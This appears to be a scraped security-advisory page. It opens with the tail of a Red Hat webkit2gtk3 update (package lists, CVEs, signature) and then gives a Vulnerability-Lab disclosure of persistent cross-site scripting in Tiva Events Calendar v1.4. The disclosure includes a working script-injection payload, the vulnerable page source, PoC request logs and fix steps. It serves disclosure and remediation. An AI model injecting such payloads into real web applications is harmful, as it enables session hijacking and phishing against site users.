webkit2gtk3-debuginfo-2.38.5-1.el9_2.3.ppc64le.rpm  
webkit2gtk3-debugsource-2.38.5-1.el9_2.3.ppc64le.rpm  
webkit2gtk3-devel-2.38.5-1.el9_2.3.ppc64le.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el9_2.3.ppc64le.rpm  
webkit2gtk3-jsc-2.38.5-1.el9_2.3.ppc64le.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el9_2.3.ppc64le.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el9_2.3.ppc64le.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el9_2.3.ppc64le.rpm

s390x:  
webkit2gtk3-2.38.5-1.el9_2.3.s390x.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el9_2.3.s390x.rpm  
webkit2gtk3-debugsource-2.38.5-1.el9_2.3.s390x.rpm  
webkit2gtk3-devel-2.38.5-1.el9_2.3.s390x.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el9_2.3.s390x.rpm  
webkit2gtk3-jsc-2.38.5-1.el9_2.3.s390x.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el9_2.3.s390x.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el9_2.3.s390x.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el9_2.3.s390x.rpm

x86_64:  
webkit2gtk3-2.38.5-1.el9_2.3.i686.rpm  
webkit2gtk3-2.38.5-1.el9_2.3.x86_64.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el9_2.3.i686.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el9_2.3.x86_64.rpm  
webkit2gtk3-debugsource-2.38.5-1.el9_2.3.i686.rpm  
webkit2gtk3-debugsource-2.38.5-1.el9_2.3.x86_64.rpm  
webkit2gtk3-devel-2.38.5-1.el9_2.3.i686.rpm  
webkit2gtk3-devel-2.38.5-1.el9_2.3.x86_64.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el9_2.3.i686.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el9_2.3.x86_64.rpm  
webkit2gtk3-jsc-2.38.5-1.el9_2.3.i686.rpm  
webkit2gtk3-jsc-2.38.5-1.el9_2.3.x86_64.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el9_2.3.i686.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el9_2.3.x86_64.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el9_2.3.i686.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el9_2.3.x86_64.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el9_2.3.i686.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el9_2.3.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-32435  
https://access.redhat.com/security/cve/CVE-2023-32439  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJktsBrAAoJENzjgjWX9erEiakP/0rpWz6YOCkcXbhxrw/eVo/+  
kpHQ96DXZZxFueZM9M3t97uQCEKQbSx3I4SYvhAntlVI1Nyd+3NhJPBUSQCJ5Ikh  
0PfSNevk2D58IxFaqVEDB4nBtuykcxoVxAucyurmpWzn232q/zUM+vu9J87WeL8r  
tx6hwHpRaL7bQX9nYj2T6bNvco7A8eQnuecDRIPY9UmrKw6CR1VyzT/8rKCNHy4n  
ze02Es4ubvoW91G/UxyghgcSZ9qD+VViaZMKDQ0h56Jc78jPMnxorKqnxnwiQLuM  
6tTloitKIc5hSAIEGXUooAaUJEHO2zsi+H0mDWHwigz6pPkSaQ7vAOnwQZGJp5dm  
w9WYM5qHrIFUEIPdGHuK84Qp0vCcmJ5PHowmS42m5R13Iv9pnGOdAbl9U56F9UMM  
3ygWOVy1Lm3KXxE96CO65ljPdpnCXlj4+ldRwPNM65kBvuRVi+RsR+MPvBukvdP+  
XL4QoXdaw0MRRlqHheFgvhkVIGLAXFuhy6K1KoCnnd2D1n0L5gPa4JKMqPdYVwtj  
SzI2cdz/2qCXQ8ME/iYSELncO9QUW7D73ny1VYzfVEktniDOpcbk64r8Z0enfyvm  
MtktJfrO1byyynN7BSt3bfTTpJjyBRWLF/NjTZPXNQFWpsm9rraV5xF2DKHKGSOX  
jfKJdTzL1l7dZ7usO+Eh  
=eUkv  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4201-01

Tiva Events Calender version 1.4 suffers from a persistent cross site scripting vulnerability.

Document Title:  
===============  
Tiva Events Calender v1.4 - Cross Site Scripting Vulnerability

References (Source):  
====================  
https://www.vulnerability-lab.com/get_content.php?id=2276

Release Date:  
=============  
2023-07-05

Vulnerability Laboratory ID (VL-ID):  
====================================  
2276

Common Vulnerability Scoring System:  
====================================  
5

Vulnerability Class:  
====================  
Cross Site Scripting - Persistent

Current Estimated Price:  
========================  
500€ - 1.000€

Product & Service Introduction:  
===============================  
Events Calendar For PHP is a powerful PHP calendar script that can be easily integrated and used with various PHP projects,  
such as scheduler, event handler, etc. The calendar is simple to install, deploy, and use. It is suitable for all types of  
service businesses to get online reservations without any hassles.

(Copy of the Homepage:https://codecanyon.net/item/tiva-events-calendar-for-php/19199337  )

Abstract Advisory Information:  
==============================  
The vulnerability laboratory core research team discovered a persistent script code inject vulnerability in the Tiva Events Calender v1.4 web-application.

Affected Product(s):  
====================  
tiva_theme  
Product: Tiva Events Calender - Calender PHP (Web-Application)

Vulnerability Disclosure Timeline:  
==================================  
2021-04-03: Researcher Notification & Coordination (Security Researcher)  
2021-04-04: Vendor Notification 1 (Security Department)  
2021-06-24: Vendor Notification 2 (Security Department)  
2021-07-13: Vendor Notification 3 (Security Department)  
****-**-**: Vendor Response/Feedback (Security Department)  
****-**-**: Vendor Fix/Patch (Service Developer Team)  
****-**-**: Security Acknowledgements (Security Department)  
2023-07-05: Public Disclosure (Vulnerability Laboratory)

Discovery Status:  
=================  
Published

Exploitation Technique:  
=======================  
Remote

Severity Level:  
===============  
Medium

Authentication Type:  
====================  
Restricted Authentication (User Privileges)

User Interaction:  
=================  
Low User Interaction

Disclosure Type:  
================  
Responsible Disclosure

Technical Details & Description:  
================================  
A persistent input validation web vulnerability has been discovered in the official Tiva Events Calender v1.4 web-application.  
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser  
to web-application requests from the application-side.

The vulnerability is located in the name input field and name parameter. Remote attackers privileged user accounts are able to inject  
own malicious script codes as name. Thus results in a persistent execute of the script code in the backend on edit but as well in the  
frontend (index) were the event is being displayed after the submit (save) via post method request. In the same direction it is possible  
to inject malformed client-side executable script code in get request to trigger a non-persistent execution.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects  
to malicious source and persistent manipulation of affected frontend / backend application modules.

Request Method(s):  
[+] POST / GET

Vulnerable Input(s):  
[+] Name

Vulnerable Parameter(s):  
[+] name

Affected Module(s):  
[+] index.php (Frontend on Event Preview)  
[+] edit.php (Backend on Edit ID)

Proof of Concept (PoC):  
=======================  
The persistent input validation web vulnerability can be exploited by remote attackers with low privileged user account and with low user interaction.  
For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.

Exploitation: Payload  
%20"<img src="evil.source" onload=alert(document.domain)>

Vulnerable Source: Frontend (Index)  
<tr><td class="calendar-day-normal"><span class="calendar-day-weekend">8</span></td>  
<td class="calendar-day-normal"><div class="calendar-day-file">9<div class="calendar-file-name color-4" onclick="downloadFile(220)">  
<span class="event-name">event1"%20"<img src="evil.source" onload=alert(document.domain)></span></div></div></td><td class="calendar-day-normal">10</td>  
<td class="calendar-day-normal">11</td><td class="calendar-day-normal">12</td><td class="calendar-day-normal">13</td>  
<td class="calendar-day-normal"><span class="calendar-day-weekend">14</span></td></tr>

Vulnerable Source: Backend (Edit ID)  
<section class="panel">  
<header class="panel-heading"><i class="fa fa-folder-open"></i> Edit File</header>  
<div class="panel-body">  
<div class="alert alert-success">  
<button data-dismiss="alert" class="close close-sm" type="button">  
<i class="fa fa-times"></i>  
</button>Report successfully saved.</div>    
<form class="form-horizontal" action="edit.php?id=220" method="post" enctype="multipart/form-data">  
<div class="form-group">  
<label class="col-lg-2 col-sm-2 control-label">Name<span class="star">&nbsp;*</span></label>  
<div class="col-sm-8">  
<input type="text" name="name" class="form-control" value="event1"%20"<img src="evil.source" onload=alert(document.domain)>" required />  
</div></div>

--- PoC Session Logs (POST) ---  
https://tiva-cal.localhost:8080/admin/report/edit.php  
Host: tiva-cal.localhost:8080  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Content-Type: multipart/form-data; boundary=---------------------------249785717017581481612148649683  
Content-Length: 745  
Origin:https://tiva-cal.localhost:8080  
Connection: keep-alive  
Referer:https://tiva-cal.localhost:8080/admin/report/edit.php  
Cookie: PHPSESSID=76gqk14e1s6cce40hfj11  
name="%20%20"<img src="evil.source" onload=alert(document.domain)>&type=1&time=20-08-2021&file=temp.txt&save=  
-  
POST: HTTP/2.0 200 OK  
server: nginx  
content-type: text/html  
content-length: 1283  
etag: "503-53ed12f4ca761"  
accept-ranges: bytes  
strict-transport-security: max-age=15768000; includeSubDomains  
-  
https://tiva-cal.localhost:8080/admin/report/evil.source  
Host: tiva-cal.localhost:8080  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0  
Accept: image/webp,*/*  
Connection: keep-alive  
Referer:https://tiva-cal.localhost:8080/admin/report/edit.php?id=222  
Cookie: PHPSESSID=76gqk14e1s6cce40hfj11  
-  
GET: HTTP/2.0 200 OK  
server: nginx  
content-type: text/html  
content-length: 1283  
etag: "503-53ed12f4ca761"  
accept-ranges: bytes  
strict-transport-security: max-age=15768000; includeSubDomains

Solution - Fix & Patch:  
=======================  
The vulnerability can be patched by the following steps ...  
1. Encode and escape the name input field content on transmit via post method  
2. Restrict the input field and disallow insert of special chars  
3. Parse the output location on the index frontend via encode to sanitize and prevent the execute  
4. Parse the output location on the edit id report backend via encode to sanitize and prevent the execute

Security Risk:  
==============  
The security risk of the persistent input validation vulnerability in the web-application is estimated as medium.

Credits & Authors:  
==================  
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,  
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab  
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits  
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do  
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.  
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:www.vulnerability-lab.com    www.vuln-lab.com        www.vulnerability-db.com

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.  
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other  
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other  
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or  
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™

--   
VULNERABILITY LABORATORY (VULNERABILITY LAB)  
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Tag

#web